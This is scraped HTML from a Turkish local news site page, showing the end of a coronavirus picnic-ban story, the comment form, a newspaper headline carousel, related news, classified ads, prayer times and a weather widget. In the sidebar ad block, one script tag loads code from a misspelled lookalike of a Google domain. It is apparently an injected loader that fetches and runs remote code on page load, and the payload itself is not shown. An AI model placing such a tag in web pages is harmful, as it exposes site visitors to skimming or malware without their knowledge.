href="http://www.elbistaninsesi.com/haberleri/Koronavir%C3%BCs+nedeniyle+mangal+ve+piknik+yapmak+da+yasakland%C4%B1" title="Koronavirüs Nedeniyle Mangal Ve Piknik Yapmak Da Yasaklandı haberleri">Koronavirüs Nedeniyle Mangal Ve Piknik Yapmak Da Yasaklandı</a></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/koronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(66103);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="66103" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="b776762706df03ba98add3083f80726376320e06" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/koronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/gunes" title="Güneş" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/gunes.jpg" alt="Güneş"/></div> <p>Güneş</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/harbi-gazete" title="Harbi Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/harbi-gazete.jpg" alt="Harbi Gazete"/></div> <p>Harbi Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/ortadogu" title="Ortadoğu" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/ortadogu.jpg" alt="Ortadoğu"/></div> <p>Ortadoğu</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/star" title="Star" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/star.jpg" alt="Star"/></div> <p>Star</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/turkiye.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-asya" title="Yeni Asya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/yeni-asya.jpg" alt="Yeni Asya"/></div> <p>Yeni Asya</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-birlik" title="Yeni Birlik" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/yeni-birlik.jpg" alt="Yeni Birlik"/></div> <p>Yeni Birlik</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenisoz" title="Yenisöz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/yenisoz.jpg" alt="Yenisöz"/></div> <p>Yenisöz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-03-21//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/alagoz-ekonomik-pakette-oncelik-esnaflara-verilmeliydi-h66106.html" title="Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/alagoz_ekonomik_pakette_oncelik_esnaflara_verilmeliydi_h66106_b7e6a.jpg" alt="Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”" /> <span>Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/berber-ve-kuaforler-saat-1800den-sonra-kapanacak-h66105.html" title="Berber ve kuaförler, saat 18.00’den sonra kapanacak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/berber_ve_kuaforler_saat_1800den_sonra_kapanacak_h66105_4b083.jpg" alt="Berber ve kuaförler, saat 18.00’den sonra kapanacak" /> <span>Berber ve kuaförler, saat 18.00’den sonra kapanacak</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gungor-imar-plani-calismalarini-yerinde-inceledi-h66104.html" title="Başkan Güngör, imar planı çalışmalarını yerinde inceledi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/baskan_gungor_imar_plani_calismalarini_yerinde_inceledi_h66104_8a193.jpg" alt="Başkan Güngör, imar planı çalışmalarını yerinde inceledi" /> <span>Başkan Güngör, imar planı çalışmalarını yerinde...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/iyi-parti-genclik-kollarindan-yaslilar-icin-gonulluluk-hareketi-h66102.html" title="İYİ Parti Gençlik Kolları’ndan yaşlılar için gönüllülük hareketi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/iyi_parti_genclik_kollarindan_yaslilar_icin_gonulluluk_hareketi_h66102_59280.jpg" alt="İYİ Parti Gençlik Kolları’ndan yaşlılar için gönüllülük hareketi" /> <span>İYİ Parti Gençlik Kolları’ndan yaşlılar için...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-mirac-allah-a-yukselis-ve-arinmadir-h66099.html" title="Başkan Gürbüz, “Miraç Allah&#039;a yükseliş ve arınmadır”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/baskan_gurbuz_mirac_allah_a_yukselis_ve_arinmadir_h66099_a0c60.jpg" alt="Başkan Gürbüz, “Miraç Allah&#039;a yükseliş ve arınmadır”" /> <span>Başkan Gürbüz, “Miraç Allah&#039;a yükseliş...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/baskan-bulut-tarim-sektoru-icin-de-ekonomik-paket-aciklanmali-h66098.html" title="Başkan Bulut: “Tarım sektörü için de ekonomik paket açıklanmalı”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/baskan_bulut_tarim_sektoru_icin_de_ekonomik_paket_aciklanmali_h66098_692e3.jpg" alt="Başkan Bulut: “Tarım sektörü için de ekonomik paket açıklanmalı”" /> <span>Başkan Bulut: “Tarım sektörü için de ekonomik...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/6-ayakli-dogan-kuzu-gorenleri-sasirtiyor-h66097.html" title="6 ayaklı doğan kuzu, görenleri şaşırtıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/6_ayakli_dogan_kuzu_gorenleri_sasirtiyor_h66097_4d32d.jpg" alt="6 ayaklı doğan kuzu, görenleri şaşırtıyor" /> <span>6 ayaklı doğan kuzu, görenleri şaşırtıyor</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/baskan-general-kredi-ertelemesine-yonelik-calismalar-basladi-h66096.html" title="Başkan General: “Kredi ertelemesine yönelik çalışmalar başladı”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/baskan_general_kredi_ertelemesine_yonelik_calismalar_basladi_h66096_4f333.jpg" alt="Başkan General: “Kredi ertelemesine yönelik çalışmalar başladı”" /> <span>Başkan General: “Kredi ertelemesine yönelik çalışmalar...</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/dogalgazli-yeni-bakimli-31-konforlu-daire-12421.html" title="DOĞALGAZLI-YENİ BAKIMLI 3+1 KONFORLU DAİRE" >DOĞALGAZLI-YENİ BAKIMLI 3+1 KONFORLU DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/dogalgazli-yeni-bakimli-31-konforlu-daire-12421.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/d8e389793f6b05b766ec985d2f20dadc9868f7b0.jpg" alt="DOĞALGAZLI-YENİ BAKIMLI 3+1 KONFORLU DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-12417.html" title="Kiralık Daire" >Kiralık Daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-12417.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık Daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12412.html" title="SATILIK DAİRE" >SATILIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12412.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12411.html" title="SATILIK DAİRE" >SATILIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12411.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-12408.html" title="SATILIK TARLA" >SATILIK TARLA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-12408.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK TARLA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/hukuk-burosunda-calisacak-bayan-eleman-12407.html" title="HUKUK BÜROSUNDA ÇALIŞACAK BAYAN ELEMAN" >HUKUK BÜROSUNDA ÇALIŞACAK BAYAN ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/hukuk-burosunda-calisacak-bayan-eleman-12407.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="HUKUK BÜROSUNDA ÇALIŞACAK BAYAN ELEMAN" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/orhangazi-mhcogulhan-yol-kavsagi-civ-satilik-ev-12406.html" title="ORHANGAZİ MH.ÇOGULHAN YOL KAVŞAĞI CİV. SATILIK EV" >ORHANGAZİ MH.ÇOGULHAN YOL KAVŞAĞI CİV. SATILIK EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/orhangazi-mhcogulhan-yol-kavsagi-civ-satilik-ev-12406.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/fee575e511ce0525533e43cc20f1f6992bcf611d.jpg" alt="ORHANGAZİ MH.ÇOGULHAN YOL KAVŞAĞI CİV. SATILIK EV" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kizilcaoba-mhpancar-kopciv2-katli-satilik-ev-12405.html" title="KIZILCAOBA MH.PANCAR KOP.CİV.2 KATLI SATILIK EV" >KIZILCAOBA MH.PANCAR KOP.CİV.2 KATLI SATILIK EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kizilcaoba-mhpancar-kopciv2-katli-satilik-ev-12405.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/a96cd9b7f89c303c1a820fcff13ea0fc258d2a9e.jpg" alt="KIZILCAOBA MH.PANCAR KOP.CİV.2 KATLI SATILIK EV" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-12404.html" title="Kiralik" >Kiralik</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-12404.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralik" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-ev-12403.html" title="KİRALIK EV" >KİRALIK EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-ev-12403.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK EV" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-is-yeri-12395.html" title="kiralık iş yeri" >kiralık iş yeri</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-is-yeri-12395.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralık iş yeri" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cagri-merkezi-personeli-12392.html" title="çağrı merkezi personeli" >çağrı merkezi personeli</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cagri-merkezi-personeli-12392.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="çağrı merkezi personeli" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-41-12391.html" title="Satlık 4+1" >Satlık 4+1</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-41-12391.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satlık 4+1" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-sifir-daire-12390.html" title="Satlık Sıfır daire" >Satlık Sıfır daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-sifir-daire-12390.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satlık Sıfır daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cagri-merkezi-12387.html" title="ÇAĞRI MERKEZİ" >ÇAĞRI MERKEZİ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cagri-merkezi-12387.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ÇAĞRI MERKEZİ" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/elbistan-da-silahli-saldiri-2-olu-h65944.html" title="Elbistan#039;da silahlı saldırı:..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/elbistan_da_silahli_saldiri_2_olu_h65944_0f61e.jpg" alt="Elbistan#039;da silahlı saldırı:..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-da-silahli-saldiri-2-olu-h65944.html" title="" ><span class="en-hit">1.</span> <strong>Elbistan&#039;da silahlı saldırı:...</strong> <span class="en-spot en-hidden">Elbistan&#039;da kimliği belirsiz kişi ya da kişilerce düzenlenen...</span></a></div></li> <li class="en-hidden"><a 